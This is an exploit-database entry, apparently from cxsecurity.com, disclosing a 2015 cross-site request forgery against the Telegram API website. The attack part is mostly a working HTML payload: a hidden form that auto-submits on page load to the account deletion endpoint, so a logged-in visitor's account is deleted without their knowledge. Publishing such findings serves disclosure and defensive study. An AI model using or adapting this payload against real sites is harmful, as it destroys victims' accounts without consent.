Telegram API Cross Site Request Forgery

2015.07.03
Credit: C4T
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/*********************************************************************************** ** Exploit Title: Telegram API Cross Site Request Forgery ** ** Exploit Author: C4T ** ** Vendor Homepage : http://my.telegram.org ** ** Google Dork: none ** ** Date: 06/27/2015 ** ** Tested on: Windows 7 ** ************************************************************************************ ** Exploit Code: ****************** <body onload="document.exploit.submit()"> <form name="exploit" action="https://my.telegram.org/deactivate/do_delete" id="deactivate_phone_form" onsubmit="return sendPassword(event);"> <input type="hidden" name="message" value="ExploitedByC4T"> </form> ************************************************************************************* ** Description: ****************** when a user is logging in telegram API just by openning a web page containing this exploit his account will be deleted. Discovered by C4T @ Ashiyane Digital Security Team. ------------------------------------------------------- ****************************************************************************************** ** ** More Details and Explanation: ** ** http://hatrhyme.com/CSRFInTelegram.pdf ** ******************************************************************************************


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top